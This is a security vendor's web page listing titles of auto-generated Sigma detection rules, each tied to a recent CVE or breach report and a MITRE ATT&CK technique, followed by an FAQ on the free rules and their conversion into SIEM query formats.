Auto-generated from Sales System Vulnerable to SQL Injection
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-4778
Breach IntelT1190 — Initial Access
Auto-generated from SQL Injection Flaw Found in Sales & Inventory System
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-4777
Breach IntelT1190 — Initial Access
Auto-generated from SQL Injection Flaw Found in Sales & Inventory System
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-30305
Breach IntelT1190 — Initial Access
Auto-generated from Syntx Command Approval Flaw Opens Door to RCE
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-30313
Breach IntelT1190 — Initial Access
Auto-generated from Critical Command Injection Flaw Undermines DSAI-Cline Sec...
🛡️ 3 more rules via /detect
Web Shell Activity Detection — CVE-2025-15612
Breach IntelT1505.003 — Persistence
Auto-generated from Wazuh Vulnerability: Insecure Scripts Open Door to Supply...
🛡️ 4 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-33739
Breach IntelT1190 — Initial Access
Auto-generated from FOG Project Flaw: Stored XSS Lurks in Management Tables
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-33881
Breach IntelT1190 — Initial Access
Auto-generated from Windmill Dev Platform Suffers Critical Code Injection Flaw
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-33879
Breach IntelT1190 — Initial Access
Auto-generated from FLIP Platform Login Vulnerable to Brute-Force Attacks
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-1672
Breach IntelT1190 — Initial Access
Auto-generated from WooCommerce Plugin Vulnerable to CSRF Attacks
🛡️ 4 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-1961
Breach IntelT1190 — Initial Access
Auto-generated from Foreman Vulnerability Opens Door for Remote Code Execution
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-1340
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-1340 — Ivanti Endpoint Manager Mobile (EPMM): Iv...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-34197
Breach IntelT1190 — Initial Access
Auto-generated from Apache ActiveMQ Broker RCE via Jolokia JMX Bridge
🛡️ 3 more rules via /detect
Browser Cookie/Credential Store Access
Breach IntelT1539 — Credential Access
Auto-generated from Lollms Session Hijacking Flaw: Password Resets Don't Cut It
Web Application Exploitation Attempt — CVE-2026-3499
Breach IntelT1190 — Initial Access
Auto-generated from WooCommerce Plugin Vulnerable to CSRF Attacks
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-28390
Breach IntelT1190 — Initial Access
Auto-generated from OpenSSL Vulnerability: Null Pointer Dereference Leads to DoS
🛡️ 2 more rules via /detect
Drive-by Download via Browser — CVE-2026-34564
Breach IntelT1189 — Initial Access
Auto-generated from CI4MS CMS Vulnerable to Stored XSS via Menu Management
Web Application Exploitation Attempt — CVE-2026-34385
Breach IntelT1190 — Initial Access
Auto-generated from Fleet MDM Vulnerability: SQL Injection Threatens Sensitiv...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-31059
Breach IntelT1190 — Initial Access
Auto-generated from UTT HiPER Router Flaw Opens Door for Remote Command Execu...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-33373
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-33373 — An issue was discovered in Zimbra Collab...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-35200
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-35200 — Parse Server is an open source backend t...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-4781
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-4781 — A flaw has been found in SourceCodester S...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-4779
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-4779 — A security vulnerability has been detecte...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-3479
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-3479 — DISPUTED: The project has clarified that ...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-22207
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-22207 — OpenViking through version 0.1.18, prior...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-4570
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-4570 — A vulnerability was identified in SourceC...
🛡️ 5 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-35035
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-35035 — CI4MS is a CodeIgniter 4-based CMS skele...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-34976
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-34976 — Dgraph is an open source distributed Gra...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-34365
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-34365 — InvoiceShelf is an open-source web & mob...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-34729
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-34729 — phpMyFAQ is an open source FAQ web appli...
🛡️ 4 more rules via /detect
Web Application Exploitation Attempt — CVE-2025-68153
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2025-68153 — Juju is an open source application orche...
🛡️ 3 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-30573
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-30573 — A Business Logic vulnerability exists in...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-30526
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-30526 — A Reflected Cross-Site Scripting (XSS) v...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-30523
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-30523 — A Business Logic vulnerability exists in...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-4420
Breach IntelT1190 — Initial Access
Auto-generated from CVE-2026-4420 — Bludit is vulnerable to Stored Cross-Site...
🛡️ 2 more rules via /detect
Credential Abuse from Breached Vendor — Medical Device Firm Hit by Cyberattack, INCD Warns
🇮🇱 INCD IntelT1078.004 — Initial Access
Auto-generated from Medical Device Firm Hit by Cyberattack, INCD Warns
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — Critical Rockwell Controller Flaw
🇮🇱 INCD IntelT1190 — Initial Access
Auto-generated from Critical Rockwell Controller Flaw Exploited in Global Att...
🛡️ 2 more rules via /detect
Exploitation Attempt — Cloud Resilience Data Loss
🇮🇱 INCD IntelT1485 — Impact
Auto-generated from Cloud Resilience Isn't Backup: INCD Warns Against Data Lo...
New rules ship with every breach.
2052 detection rules and growing. Use /detect to generate Sigma rules for any breach — converted to your SIEM format instantly.
Detection Vault FAQ
What is Sigma and why use it?
Sigma is a generic, vendor-neutral signature format for SIEM systems — the YAML equivalent of Snort/YARA for log-based detections. Write a detection once in Sigma, then convert to your platform (Splunk SPL, Sentinel KQL, Elastic, QRadar AQL, Wazuh). Every rule in the SCW Detection Vault ships in Sigma format for free.
Are these detection rules really free?
Yes. All Sigma rules in the Detection Vault are free to copy, paste and use — commercial or non-commercial. SIEM-native exports (Splunk SPL, Sentinel KQL, Elastic ES|QL, QRadar AQL, Wazuh) are available through the SCW Intel Bot on Telegram.
How often is the vault updated?
New detection rules are auto-generated within minutes of new CVE publications on the National Vulnerability Database (NVD), Israeli INCD advisories, and major breach disclosures. Curated rules from real-world SOC engagements are added on a rolling basis.
Can I convert these rules to KQL, SPL or my SIEM?
Yes — message the SCW Intel Bot on Telegram with the rule title or CVE ID. The bot returns the rule in your chosen SIEM dialect (Splunk SPL, Microsoft Sentinel KQL, Elastic ES|QL, IBM QRadar AQL, Wazuh).
Are rules mapped to MITRE ATT&CK?
Every rule includes the relevant MITRE ATT&CK technique IDs (e.g. T1190, T1059) so you can align coverage gaps to your existing detection engineering roadmap and the ATT&CK Navigator.